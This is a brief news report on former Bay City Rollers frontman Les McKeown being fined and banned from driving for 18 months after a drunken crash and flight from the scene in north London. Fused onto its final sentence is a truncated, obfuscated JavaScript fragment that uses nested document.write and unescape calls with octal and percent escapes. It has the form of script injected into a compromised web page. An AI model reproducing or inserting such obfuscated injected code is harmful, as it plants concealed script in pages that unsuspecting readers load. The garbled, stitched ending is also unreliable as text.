Former Bay City Rollers frontman Les McKeown is forbidden to drive after a drunk- driving incident. The BBC reports McKeown has been fined about £1000 and banned from driving for 18 months after crashing his car in north London last year.
According to testimony, McKeown swerved his Volvo and caused another vehicle to drive into his side, leaving him stuck on a traffic island. Witnesses say he fled the scene and threatened passers-by who tried to get him to wait for police. McKeown changed his plea three times and finally admitted to driving while drunk and having no insurance. His lawyer told the court McKeown's money has run out because of his lifestyle and his only income is from occasional concerts.document.write(unescape('\04564%6F%63um\145%6Et.%77r%69t\145\04528u%6E\04565s\04563ap\04565\04528\047\045253C%21%5C0\0645\062D%252D\047)\051;
